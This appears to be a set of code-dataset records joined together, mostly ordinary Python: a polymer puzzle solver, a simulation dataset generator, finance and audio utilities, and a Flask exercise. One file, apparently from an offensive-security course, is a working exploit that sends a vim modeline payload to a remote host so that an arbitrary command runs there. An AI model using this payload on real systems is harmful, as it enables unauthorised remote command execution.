element_count_after(\n iterations: int,\n template: List[str],\n rules: Dict[Tuple[str, str], str]) \\\n -> List[Tuple[str, int]]:\n '''\n Computes the number of units of each element required to apply `rules` to\n `template` `iterations` times. The returned element-count list is sorted\n from most to least common.\n '''\n # The exact order of elements in the polymer doesn't matter, so rather than\n # generate the full sequence on each iteration (which would grow\n # exponentially), we'll just track how many of each pair it contains.\n pair_counts: Dict[Tuple[str, str], int] = defaultdict(int)\n for pair in pairwise(template):\n pair_counts[pair] += 1\n\n for _ in range(iterations):\n new_counts: Dict[Tuple[str, str], int] = defaultdict(int)\n for pair, count in pair_counts.items():\n new_counts[(pair[0], rules[pair])] += count\n new_counts[(rules[pair], pair[1])] += count\n pair_counts = new_counts\n\n # Count the number of each unit type appearing in the resulting polymer.\n # Because we're tracking pairs and not individual units, every unit is\n # double-counted, except for the first and last which only appear in one\n # pair each. 
Initialise both of these to one to compensate.\n unit_counts: Dict[str, int] = defaultdict(int)\n unit_counts[template[0]] += 1\n unit_counts[template[-1]] += 1\n for pair, count in pair_counts.items():\n unit_counts[pair[0]] += count\n unit_counts[pair[1]] += count\n counts_list = [(unit, count // 2) for unit, count in unit_counts.items()]\n counts_list.sort(key=lambda x: -x[1])\n return counts_list\n\n\ndef read_input(lines: Iterable[str]) -> Tuple[str, Dict[Tuple[str, str], str]]:\n '''\n Parses the problem input and returns a tuple containing the initial\n template and a dictionary of the insertion rules.\n '''\n lines_iter = iter(lines)\n template = next(lines_iter).strip()\n next(lines_iter) # Skip blank line between template and insertion rules\n\n insertion_rules = {}\n for line in lines_iter:\n pair, insertion = line.strip().split(' -> ')\n insertion_rules[(pair[0], pair[1])] = insertion\n\n return template, insertion_rules\n\n\nclass TestDay14(unittest.TestCase):\n '''\n Example test cases for Day 14, as specified in the problem description\n '''\n # pylint: disable=missing-function-docstring\n\n def setUp(self):\n self.data = [\n 'NNCB\\n',\n '\\n',\n 'CH -> B\\n',\n 'HH -> N\\n',\n 'CB -> H\\n',\n 'NH -> C\\n',\n 'HB -> C\\n',\n 'HC -> B\\n',\n 'HN -> C\\n',\n 'NN -> C\\n',\n 'BH -> H\\n',\n 'NC -> B\\n',\n 'NB -> B\\n',\n 'BN -> B\\n',\n 'BB -> N\\n',\n 'BC -> B\\n',\n 'CC -> N\\n',\n 'CN -> C'\n ]\n\n def test_part1_example(self):\n self.assertEqual(part1(self.data), 1588)\n\n def test_part2_example(self):\n self.assertEqual(part2(self.data), 2188189693529)\n","repo_name":"jamesconstable/aoc2021","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10432454461","text":"from data_handler import HDF5DataBuilder\nfrom PBSHM_mdof.system.simulation import Simulation\nfrom PBSHM_mdof.system.population import Population\nfrom PBSHM_mdof.system.mdof_system import MdofSystem\nfrom PBSHM_mdof.system.population_manipulator import PopulationManipulator\nfrom utils import resonance_frequency_computation\n\nfrom config import settings\nimport numpy as np\nfrom tqdm import tqdm\nimport h5py\nimport logging\n\nlogging.basicConfig(level=logging.INFO, \nformat='%(asctime)s - %(levelname)s - %(message)s',\nfilemode='w',filename='logs/generate_data.log')\n\ndt = settings.default['simulation']['dt'] \nt_end = settings.default['simulation']['t_end']\npath_dataset = settings.default['path']['generated_dataset']\npopulation_params_path= settings.default['path']['population_params']\n\ndef main():\n\n\n population = Population()\n population.load_population(population_params_path)\n logging.info(f'Loaded population from file {population_params_path}')\n pop_manipulator = PopulationManipulator(population)\n\n with h5py.File(path_dataset, 'w') as f:\n dh = HDF5DataBuilder(f)\n \n # Save healthy simulations and population parameters\n pop_grp = dh.set_save_population(population=population)\n std_latent = 20\n mean_latent = 50\n simulation_name='default_simulation'\n simu_grp = dh.set_save_simulation_params(pop_grp,simulation_name, dt=dt, t_end=t_end, std_latent=std_latent)\n\n # run experiments\n state = 'healthy'\n for i in tqdm(range(1200)):\n # parameter for the simulation\n amplitude = 5 * (-np.log(1-np.random.uniform(0, 1 )))**(1/1.9)+10\n anomaly_level=0\n loc = 7\n latent_value = np.random.normal(mean_latent, std_latent)\n experiment_name = 
f'experiment_{i}_{state}_{anomaly_level}'\n\n # do experiments\n\n \n attempt = 1\n run =True\n while run : \n requests = [{'type': 'environment', 'latent_value': latent_value, 'coefficients': 'load'}]\n population_affected = pop_manipulator.affect(requests)\n simulator = Simulation(population_affected, dt, t_end)\n simulation_data = simulator.simulation_white_noise(location=loc, amplitude=amplitude)\n if simulation_data is None:\n latent_value = np.random.normal(mean_latent, std_latent)\n amplitude = np.sqrt(np.square(np.random.normal(15, 5)) + 10)\n logging.info(f'Attempt {attempt} for simulation {i}')\n attempt += 1\n\n else:\n run=False \n\n \n # save experiments\n exp_grp = dh.set_save_experiment_params(simu_grp, experiment_name, latent_value, anomaly_level, state, loc, amplitude)\n dh.save_experiment_population_params(exp_grp, population_affected)\n dh.save_experiment_time_domain_data(exp_grp, simulation_data)\n \n logging.info(f'Saved simulation data for id={i}, latent_value={latent_value}')\n \n # Save anomalous simulations\n for anomaly_level in range(1, 14, 2):\n\n state = 'anomalous' \n for i in tqdm(range(200)):\n # parameter for the simulation\n ai = anomaly_level/100\n amplitude = 5 * (-np.log(1-np.random.uniform(0, 1)))**(1/1.9)+10\n loc = 7\n latent_value = np.random.normal(mean_latent, std_latent)\n experiment_name = f'experiment_{i}_{state}_{ai}'\n # do experiments\n attempt = 1\n run =True\n while run : \n requests = [{'type': 'environment', 'latent_value': latent_value, 'coefficients': 'load'},\n {'type': 'anomaly', 'location': 5, 'anomaly_size': ai, 'anomaly_type': 'stiffness'}]\n population_affected = pop_manipulator.affect(requests)\n simulator = Simulation(population_affected, dt, t_end)\n simulation_data = simulator.simulation_white_noise(location=loc, amplitude=amplitude)\n if simulation_data is None:\n latent_value = np.random.normal(mean_latent, std_latent)\n amplitude = np.sqrt(np.square(np.random.normal(15, 5)) + 10)\n logging.info(f'Attempt {attempt} for simulation {i}')\n attempt += 1\n\n else:\n run=False \n\n \n exp_grp = dh.set_save_experiment_params(simu_grp, experiment_name, latent_value, ai, state, loc, amplitude)\n dh.save_experiment_population_params(exp_grp, population_affected)\n dh.save_experiment_time_domain_data(exp_grp, simulation_data)\n \n logging.info(f'Saved simulation data for id={i},anomaly_level={ai}, latent_values={latent_value}')\n\nif __name__=='__main__':\n main()","repo_name":"YacineBelHadj/PBSHM_mdof","sub_path":"PBSHM_mdof/data/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3264134300","text":"import yfinance as yf\r\nimport pandas as pd\r\n\r\n\r\ndef get_securities_adjusted_prices_from_yahoo(symbol_list, start_date, end_date, interval=\"1d\", to_csv=False):\r\n \"\"\"\r\n Uses the yfinance package (https://pypi.org/project/yfinance/) to fetch the historical prices\r\n of a list of securities.\r\n\r\n :param symbol_list:\r\n List of strings containing all securities + factors to fetch\r\n\r\n :param start_date:\r\n The start date for the historical data in format \"%Y-%m-%d\"\r\n\r\n :param end_date:\r\n The ending date for the historical data in format \"%Y-%m-%d\"\r\n\r\n :param interval:\r\n Interval between each data point. 
By default it is set to 1 day.\r\n\r\n :param to_csv:\r\n Boolean to save or not the resulting dataframe to csv format.\r\n\r\n :return: A dataframe containing the price time series of the closing prices for each security\r\n \"\"\"\r\n\r\n securities_df = yf.download(tickers=symbol_list, start=start_date, end=end_date, interval=interval)\r\n securities_df = securities_df.drop([\"Close\", \"High\", \"Low\", \"Open\", \"Volume\"], axis=1)\r\n securities_df.index = pd.to_datetime(securities_df.index, format='%Y%m%d')\r\n securities_df.columns = securities_df.columns.get_level_values(1)\r\n securities_df = securities_df.dropna(axis=1, thresh=0.9 * len(securities_df.index))\r\n securities_df = securities_df.interpolate(axis=0, method=\"linear\")\r\n securities_df = securities_df.fillna(method=\"bfill\")\r\n\r\n if to_csv:\r\n securities_df.to_csv(\"securities_and_factors.csv\")\r\n\r\n return securities_df\r\n\r\n\r\ndef create_sec_and_risk_df(securities_df, factors_symbols):\r\n \"\"\"\r\n Creates 2 dataframes containing respectively securities and factor risk prices\r\n\r\n :param securities_df: pandas.Dataframe\r\n Dataframe containing prices of all assets\r\n\r\n :param factors_symbols: List of str\r\n List of strings containing the risk factors symbols\r\n\r\n :return: 2 dataframes\r\n \"\"\"\r\n\r\n risk_df = securities_df[factors_symbols]\r\n risk_df.index = pd.to_datetime(risk_df.index, format='%Y-%m-%d')\r\n sec_df = securities_df.drop(factors_symbols, axis=1)\r\n sec_df.index = pd.to_datetime(sec_df.index, format='%Y-%m-%d')\r\n\r\n return sec_df, risk_df\r\n\r\n\r\ndef keep_random_columns_in_df(dataframe, n_to_keep, random_seed=None):\r\n \"\"\"\r\n Function that takes a dataframe of securities as parameter and returns\r\n a new dataframe after removing n securities\r\n\r\n :param dataframe: pandas.Dataframe\r\n dataframe containing the prices of different securities\r\n\r\n :param n_to_keep: int\r\n integer to specify the number of securities to keep from the dataframe\r\n\r\n :param random_seed:\r\n optional seed for rng\r\n\r\n :return: dataframe\r\n \"\"\"\r\n\r\n new_df = dataframe.sample(n=n_to_keep, axis=1, random_state=random_seed)\r\n\r\n return new_df\r\n","repo_name":"DavidCico/Factor-risk-model-with-principal-component-analysis","sub_path":"data_feed.py","file_name":"data_feed.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"2597694862","text":"import logging\nfrom typing import List, Optional\n\nimport torch\nimport librosa\nimport numpy as np\nimport scipy.signal\nimport sonosco.common.audio_tools as audio_tools\nimport sonosco.common.utils as utils\nimport sonosco.common.noise_makers as noise_makers\n\nwindows = {'hamming': scipy.signal.hamming, 'hann': scipy.signal.hann, 'blackman': scipy.signal.blackman,\n 'bartlett': scipy.signal.bartlett}\n\nLOGGER = logging.getLogger(__name__)\nMIN_STRETCH = 0.7\nMAX_STRETCH = 1.3\nMIN_PITCH = 0.7\nMAX_PITCH = 1.5\nMAX_SHIFT = 4000\n\n\nclass AudioDataProcessor:\n\n def __init__(self, window_stride, window_size, sample_rate, labels=\"abc\", normalize=False, augment=False, **kwargs):\n \"\"\"\n Dataset that loads tensors via a csv containing file paths to audio files and transcripts separated by\n a comma. Each new line is a different sample. 
Example below:\n /path/to/audio.wav,/path/to/audio.txt\n Args:\n window_stride: number of seconds to skip between each window\n window_size: number of seconds to use for a window of spectrogram\n sample_rate: sample rate of the recordings\n labels: string containing all the possible characters to map to\n normalize: apply standard mean and deviation normalization to audio tensor\n augment(default False): apply random tempo and gain perturbations\n \"\"\"\n self.window_stride = window_stride\n self.window_size = window_size\n self.window = windows.get(kwargs['window'], windows['hamming'])\n self.sample_rate = sample_rate\n self.labels_map = utils.labels_to_dict(labels)\n self.normalize = normalize\n self.augment = augment\n\n @property\n def window_stride_samples(self) -> int:\n return int(self.sample_rate * self.window_stride)\n\n @property\n def window_size_samples(self) -> int:\n return int(self.sample_rate * self.window_size)\n\n def retrieve_file(self, audio_path) -> (bytes, int):\n \"\"\"\n retrieve audio from file\n Args:\n audio_path: path to audio\n\n Returns: audio, sample_rate\n\n \"\"\"\n sound, sample_rate = librosa.load(audio_path, sr=self.sample_rate)\n return sound, sample_rate\n\n def augment_audio(self, sound: np.ndarray,\n stretch: bool = True,\n shift: bool = False,\n pitch: bool = True,\n noise: bool = True) -> np.ndarray:\n \"\"\"\n Augments the audio with given parameters/\n Args:\n sound:\n stretch:\n shift:\n pitch:\n noise:\n\n Returns: augmented audio\n\n \"\"\"\n augmented = audio_tools.stretch(sound, utils.random_float(MIN_STRETCH, MAX_STRETCH)) if stretch else sound\n augmented = audio_tools.shift(augmented, np.random.randint(MAX_SHIFT)) if shift else augmented\n augmented = audio_tools.pitch_shift(augmented, self.sample_rate,\n n_steps=utils.random_float(MIN_PITCH, MAX_PITCH)) if pitch else augmented\n\n if noise:\n noise_maker = noise_makers.GaussianNoiseMaker()\n augmented = noise_maker.add_noise(augmented) if noise else augmented\n\n return augmented\n\n def parse_audio_from_file(self, audio_path: str, raw: bool = False) -> torch.FloatTensor:\n \"\"\"\n Loads audio from file.\n Args:\n audio_path:\n raw:\n\n Returns: spectogram or raw audio\n\n \"\"\"\n sound, sample_rate = self.retrieve_file(audio_path)\n if raw:\n return sound\n\n spectogram = self.parse_audio(sound, sample_rate)\n\n return spectogram\n\n def parse_audio(self, sound: np.ndarray, sample_rate: int) -> torch.FloatTensor:\n \"\"\"\n Returns spectogram of given audio.\n Args:\n sound: audio to parse\n sample_rate: sample rate\n\n Returns: spectogram\n\n \"\"\"\n if sample_rate != self.sample_rate:\n raise ValueError(f\"The stated sample rate {self.sample_rate} and the factual rate {sample_rate} differ!\")\n\n if self.augment:\n sound = self.augment_audio(sound)\n\n complex_spectrogram = librosa.stft(sound,\n n_fft=self.window_size_samples,\n hop_length=self.window_stride_samples,\n win_length=self.window_size_samples,\n window=self.window)\n spectrogram, phase = librosa.magphase(complex_spectrogram)\n # S = log(S+1)\n spectrogram = np.log1p(spectrogram)\n spectrogram = torch.FloatTensor(spectrogram)\n\n if self.normalize:\n mean = spectrogram.mean()\n std = spectrogram.std()\n spectrogram.add_(mean)\n spectrogram.div_(std)\n\n return spectrogram\n\n def parse_transcript(self, transcript_path: str) -> List[Optional[any]]:\n \"\"\"\n Parse transcription from path.\n Args:\n transcript_path:\n\n Returns: transcript\n\n \"\"\"\n with open(transcript_path, 'r', encoding='utf8') as 
transcript_file:\n transcript = transcript_file.read().replace('\\n', '')\n # TODO: Is it fast enough?\n transcript = list(filter(lambda el: el is not None,\n [self.labels_map.get(x) for x in list(transcript)]))\n return transcript\n\n def parse_audio_for_inference(self, audio_path: str) -> (np.ndarray, torch.IntTensor):\n \"\"\"\n Return spectrogram and its length in a format used for inference.\n :param audio_path: Audio path.\n :return: spect [1, seq_length, freqs], lens [scalar]\n \"\"\"\n spect = self.parse_audio_from_file(audio_path)\n spect = spect.view(1, spect.size(0), spect.size(1)).transpose(1, 2)\n lens = torch.IntTensor([spect.shape[1]]).int()\n return spect, lens\n","repo_name":"Roboy/sonosco","sub_path":"sonosco/datasets/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"85"} +{"seq_id":"7805884656","text":"import torch\nimport cv2\nimport numpy as np\n\n# Model\nmodel = torch.hub.load('ultralytics/yolov5', 'custom',\n path = 'C:/Users/ceom1/Desktop/Facultad/9no Semestre/IA/DataSet_Chapas/YOLOv5/best.pt')\n\n# Images\nvideo = 'C:/Users/ceom1/Desktop/Facultad/9no Semestre/IA/DataSet_Chapas/YOLOv5/ch03_20230901103040.mp4' # batch of images\ncap = cv2.VideoCapture(video)\n\nwhile(cap.isOpened()):\n ret,frame = cap.read()\n # Inference\n results = model(frame)\n\n #Mostrar FPS\n cv2.imshow('Detector de Chapas', np.zqueeze(results.render()))\n\n #Leemos el teclado\n t = cv2.waitKey(5)\n if t == 27:\n break\ncv2.release()\ncv2.destroyAllWindows()","repo_name":"CarlosOliveri/Detector-de-chapas","sub_path":"Detector.py","file_name":"Detector.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"600181566","text":"# Exports all the document's nodes into files\n# * Top Level Groups => Features\n# * Nested Groups => Background or Scenarios\n\n\nfrom __future__ import print_function\nimport sys\n\n# START COMMON BLOCK\n# Flying Logic sys.path is preserved between script runs do not need to keep adding it every time.\n# although it is possible that the utils script has been changed so may require a reload\nreload_needed = False\nif 'scriptParentDirectory' in globals():\n if scriptParentDirectory not in sys.path:\n sys.path.append(\"/Library/Python/2.7/site-packages\")\n sys.path.append(scriptParentDirectory)\n else:\n # TODO: better detection, reload only necessary when actively editing the utils.py\n reload_needed = True\n# noinspection PyPep8\nimport utils\n\nif reload_needed:\n reload(utils)\n# END COMMON BLOCK\n\nutils._DEBUG = False\n\ndocument.clearSelection()\n\n\ndef extract_tags(group_element):\n utils.debug(\"Extracting Tags from \", pprint=group_element.user)\n try:\n tags = []\n if (group_element.user[\"tags\"] is not None and not group_element.user[\"tags\"] == \"\"):\n for t in group_element.user[\"tags\"].split(\",\"):\n tags.append({'location': {'column': 0, 'line': 0},\n 'name': t,\n 'type': 'Tag'})\n return tags\n except KeyError:\n return []\n\n\nfeatures = []\nelements = {}\nsections = {}\nedges = {}\n\n# Iterate though all the elements, extracting details that were set by\n# 'Import Feature File' to build a new in-memory representation\n# which can then be written out.\n#\n# NOTE: document.all does walk the trees so the information of relationships and order has to be re-established.\n#\nfor elem in document.all:\n if elem.isGroup:\n if 
elem.color == Color.GREEN:\n # TOP LEVEL FEATURE\n x = {'type': 'Feature',\n 'language': 'en',\n 'keyword': u'Feature',\n 'tags': extract_tags(elem),\n 'location': {'column': 0, 'line': 0},\n 'name': elem.title,\n 'description': elem.annotationEditor.plainText,\n 'children': []}\n for c in elem.children:\n x['children'].append(c.eid)\n features.append(x)\n else:\n # Background, Scenario or Scenario Outline.\n x = {'type': elem.user[\"type\"],\n 'location': {'column': 0, 'line': 0},\n 'steps': [],\n 'keyword': elem.user[\"type\"],\n 'description': elem.annotationEditor.plainText,\n 'name': ''\n }\n\n # Background has generic title and does not support tags.\n if elem.user[\"type\"] != \"Background\":\n x['name'] = elem.title\n x['tags'] = extract_tags(elem)\n\n for c in elem.children:\n x['steps'].append(c.eid)\n sections[elem.eid] = x\n elif elem.isEdge:\n src = elem.source\n tgt = elem.target\n if src.isEntity and tgt.isEntity:\n if src.eid not in edges:\n edges[src.eid] = [tgt.eid]\n else:\n edges[src.eid].append(tgt.eid)\n else:\n utils.debug(\"Unknown Edge\")\n elif elem.isEntity:\n # utils.debug(elem, elem.eid, elem.title, elem.isEdge, elem.user)\n x = {'type': 'Step',\n 'location': {'column': 0, 'line': 0},\n 'keyword': elem.user[\"keyword\"],\n 'text': elem.title}\n elements[elem.eid] = x\n else:\n utils.debug(\"unknown element\", elem)\n\nif len(features) > 1:\n # TODO: Handle Multiple Features in a single document\n # eg. Implement choice which feature to export?\n # or export all to different files in the same folder\n raise NotImplementedError(\"too many Features in document\")\n\nfeatureDoc = {'type': 'GherkinDocument', 'comments': [], 'feature': features[0]}\n\nfor selectedFeature in features:\n # noinspection PyRedeclaration\n seen_background_node = False\n sections_in_order = []\n for eid in selectedFeature[\"children\"]:\n s = sections[eid]\n if s[\"keyword\"] == \"Background\":\n if seen_background_node:\n raise NotImplementedError(\"Too many 'Background' nodes in Feature\")\n seen_background_node = True\n sections_in_order.insert(0, s)\n elif s[\"keyword\"] == \"Scenario\":\n sections_in_order.append(s)\n else:\n raise NotImplementedError(\"Regenerating section of type %r not implemented\" % (s[\"keyword\"]))\n\n selectedFeature[\"children\"] = sections_in_order\n\n # utils.debug(\"elements\", pprint=elements)\n # utils.debug(\"edges\", pprint=edges)\n\n # Now for each section take there nodes and sort them.\n sorted_nodes = utils.nodes_by_path(edges)\n for c in selectedFeature[\"children\"]:\n ret = []\n found = False\n for s in sorted_nodes:\n if s in c[\"steps\"]:\n found = True\n ret.append(elements[s])\n c[\"steps\"] = ret\n if not found:\n raise NotImplementedError(\"\"\"\n Unable to place all items in the section\n Ensure that there are no loops, and background is connected to at least one scenario\n \"\"\")\n\ntry:\n # TODO: Element may not exist (FL API missing a good way to check)\n if document.user[\"comments\"] is not None:\n featureDoc['comments'].append(document.user[\"comments\"])\nexcept KeyError:\n pass\n\nutils.debug(\"featureDoc is \", pprint=featureDoc)\n\nfeatureFileName = Application.askForFile(Application.lastAskDirectory, True)\nutils.write_gherkin_to_file(featureFileName, featureDoc)\n# utils.debug(\"Done\")\nApplication.alert(\"Feature file 
updated\")\n","repo_name":"KJR-AU/Behaviour-Modeling","sub_path":"scripts/regenerate_feature.py","file_name":"regenerate_feature.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"6802140750","text":"# 5日线上穿10日线,股价收盘价站上10日线\n\nimport tools.TimeUtil as timeUtil\nfrom stock.BaseStock import BaseStock\nfrom stock_analysis.Avg import Avg\nimport tools.PrintUtil as pt\nimport IndexConstants as constant\nfrom stock.StockDayData import StockDayData\n\n\n# 判断该股票在某天的股价,是否站上10日线,并且5日线向上突破10日线,形成金叉\nfrom stock_analysis.Boll import Boll\n\n\ndef analysis_stock(stock_code, stock_name, trade_data):\n base = BaseStock(\"base\")\n avg = Avg()\n avg_result = avg.get_avg(stock_code, stock_name)\n\n trade_data_avg = None\n try:\n trade_data_avg = avg_result[trade_data]\n except:\n pass\n\n if trade_data_avg is None:\n return None\n\n current_stock_data = base.get_pre_stock_data(stock_code, trade_data, 0)\n pre_stock_data = base.get_pre_stock_data(stock_code, trade_data, -1)\n\n if pre_stock_data is None:\n return None\n\n pre_trade_data_avg = avg_result[pre_stock_data.get_trade_date()]\n\n if pre_stock_data is not None \\\n and trade_data_avg[\"5\"] > trade_data_avg[\"10\"] \\\n and current_stock_data.get_close() > trade_data_avg[\"5\"] \\\n and pre_trade_data_avg[\"5\"] < pre_trade_data_avg[\"10\"] \\\n and pre_stock_data.get_close() < pre_trade_data_avg[\"10\"] \\\n and pre_stock_data.get_close() > pre_trade_data_avg[\"5\"]:\n return current_stock_data\n\n return None\n\n\nif __name__ == '__main__':\n base = BaseStock(\"base\")\n stock = base.get_all_stock()\n avg = Avg()\n ball = Boll()\n\n print(\"Save data in:\" + constant.date_file_path)\n for i in range(5):\n analysis_date = \"20190821\"\n trade_data = timeUtil.day_after_day(analysis_date, -1*i)\n print(\"Start---\" + trade_data)\n result_file_path = constant.date_file_path + \"Line5Up10_\" + trade_data + \".txt\"\n # result_file_path = constant.date_file_path + \"Line5Up10.txt\"\n pt.p_file_no_format_add(result_file_path,\n [\"code,date,O,H,L,C,P,Diff,R,count,sum,avg5,avg10,avg20,up_track,avg_line,down_track\".replace(\",\", \"\t\")])\n for one in stock:\n shoot_stock = analysis_stock(one, stock[one], trade_data)\n if shoot_stock is not None:\n print(\" %s(%s):%s\" % (stock[one],one, shoot_stock.get_trade_date()))\n\n after_n_day_trade = base.get_stock_data(shoot_stock.get_ts_code(),\n stock[one],\n shoot_stock.get_trade_date(),\n timeUtil.day_after_day(trade_data, 10)\n )\n message = []\n shoot_avg_result = avg.get_avg(one, stock[one])\n shoot_ball_result = ball.get_boll(one, stock[one])\n for one_stock_data in after_n_day_trade:\n one_messgae = str(one_stock_data)\n\n try:\n shoot_avg_result[one_stock_data.get_trade_date()]\n one_messgae= one_messgae + \",%s,%s,%s\" % (\n shoot_avg_result[one_stock_data.get_trade_date()]['5'],\n shoot_avg_result[one_stock_data.get_trade_date()]['10'],\n shoot_avg_result[one_stock_data.get_trade_date()]['20']\n )\n except:\n one_messgae = one_messgae + \",_,_,_\"\n\n try:\n one_messgae = one_messgae + \",%s,%s,%s\" % (\n shoot_ball_result[one_stock_data.get_trade_date()]['up_track'],\n shoot_ball_result[one_stock_data.get_trade_date()]['avg_line'],\n shoot_ball_result[one_stock_data.get_trade_date()]['down_track']\n )\n except:\n one_messgae = one_messgae + \",_,_,_\"\n\n message.append(one_messgae.replace(\",\", \"\t\"))\n\n pt.p_file_list_with_no_format_add(result_file_path, message)\n\n 
pt.p_file_no_format_add(result_file_path,\n [\" %s(%s):%s\" % (stock[one], one, shoot_stock.get_trade_date())])\n\n","repo_name":"happyapan/indexAnalysis","sub_path":"stock_strategy/Line5UpXLine10.py","file_name":"Line5UpXLine10.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21036617376","text":"import mne\r\nimport numpy\r\n\r\n\r\ndef load_epochs(raw):\r\n evts,evts_dict = mne.events_from_annotations(raw)\r\n wanted_keys = [e for e in evts_dict.keys() if \"stimulus\" in e]\r\n evts_dict_stim=dict((k, evts_dict[k]) for k in wanted_keys if k in evts_dict)\r\n epochs = mne.Epochs(raw,evts,evts_dict_stim,tmin=-0.5,tmax=1,reject_by_annotation=False)\r\n \r\n return epochs, evts_dict\r\n\t\r\n\r\ndef save_array(filename, to_save):\r\n '''\r\n saves the array in a file with the given filename\r\n '''\r\n with open(filename, 'wb') as f:\r\n numpy.save(f, to_save)\r\n\t\t\r\n\r\ndef load_array_from_memory(filename):\r\n '''\r\n loads the array from the file with the given filename\r\n '''\r\n with open(filename, 'rb') as f:\r\n arr = numpy.load(f)\r\n return arr\r\n\r\n\t\r\ndef get_timepoints(epoch_start, epoch_end, number_of_datapoints):\r\n\t\"\"\"\r\n\tcalculates equidistant timepoints in the time range\r\n\t\"\"\"\r\n\ttime_range = numpy.abs(epoch_end) + numpy.abs(epoch_start)\r\n\tsteps = time_range / number_of_datapoints\r\n\tx = numpy.arange(start=epoch_start, stop=epoch_end, step=steps)\r\n\treturn x","repo_name":"kayroo23/Signalprocessing","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15074894117","text":"# 目录配置\n\nimport os\n\nMUSIC_PATH = \"Music\"\nIMAGE_PATH = \"Image\"\n\n# 数据库配置\n\nimport pymongo\n\nclient = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\nMONGO_DB = client[\"chunsheng\"]\n\n# rest-api\nRET = {\n \"code\": 0,\n \"msg\": \"\",\n \"data\": {}\n}\n","repo_name":"ddt666/ChunSheng","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1055762583","text":"from ast import Num\nfrom flask import Flask\napp= Flask(__name__)\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/dojo')\ndef dojo():\n return 'Dojo!'\n\n@app.route('/say/')\ndef say(name):\n print(name)\n return 'Hi' + ' ' + name +'!'\n\n@app.route('/repeat//')\ndef rep(num,name):\n newName=\"\"\n for x in range(int(num)):\n newName+=name+\" \"\n print(newName)\n return newName\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"karam-taha/flask_fundamentals","sub_path":"routing_task/Understanding_Routing.py","file_name":"Understanding_Routing.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8431078317","text":"\r\nimport fiona\r\n\r\n# ~ gdb_filename = '/mnt/c/Users/Gabriel/Geo_data/Original_SPOT_images.gdb.zip'\r\ngdb_filename = '/mnt/c/Users/Gabriel/Geo_data/Original_SPOT_images.gdb'\r\n\r\n\r\nprint(fiona.listlayers(gdb_filename))\r\n\r\nwith fiona.open(gdb_filename,'r') as gdb_open :\r\n \r\n print(len(gdb_open))\r\n # ~ for a in gdb_open:\r\n # ~ 
print(a)\r\n","repo_name":"gabrielfougeron/PyTorchLakeSegmentation","sub_path":"Open_gdb/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33397446973","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport socket\nimport argparse\nBASE_PAYLOAD = \":!{}||\\\" vi:fen:fdm=expr:fde=assert_fails(\\\"source\\!\\ \\%\\\"):fdl=0:fdt=\\\"\"\nHOST = \"m1t1.hackback.dev\"\nPORT = 16850\ndef connect(host, port, command):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host,port))\n s.sendall(command)\n while True:\n\t data = s.recv(1024)\n\t if data == \"\":\n\t\t break\n\t print(\"Recieved: %s\" % str(repr(data)))\n print(\"Connection Closed\")\n s.close()\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Command for exploiting vim source and modeline vulnerability')\n parser.add_argument('-c', help='Command to run through vim exploit', required=True, dest='command')\n args = parser.parse_args()\n connect(HOST,PORT,BASE_PAYLOAD.format(args.command))\n print(BASE_PAYLOAD.format(args.command))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MCAR43/School-Work","sub_path":"CS4001_OffensiveSecurity/misson1/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9576055133","text":"#!/usr/bin/python\n\nimport sys,os\n\nprev_word = None\nword = None\nprev_fn = None\nfn = None\nfreq_info = {}\n\nfor line in sys.stdin:\n line=line.rstrip()\n ll=line.split('\\t')\n if len(ll) > 1:\n word=ll[0]\n value=int(ll[2])\n fn = os.path.basename(ll[1]) \n\n if word == prev_word:\n freq_info[fn]=value\n else:\n if prev_word != None:\n print(\"{0}:{1}:{2}\".format(prev_word, len(freq_info),freq_info))\n freq_info = {}\n prev_word = word\n freq_info[fn]=value\n \n#if prev_word == word: \nprint(\"{0}:{1}:{2}\".format(word, len(freq_info),freq_info))\n \n","repo_name":"jared-ziqxu/HadoopMapRed","sub_path":"assignment2/task1/reducer1.py","file_name":"reducer1.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72203130198","text":"# https://www.acmicpc.net/problem/5063\n\n# 문제는 개그인듯 ㅡ.ㅡ;;;\n# 첫째 줄에 테스트 케이스의 개수 N\n# 다음 N개의 줄에는 3개의 정수 r, e, c\n# r은 광고를 하지 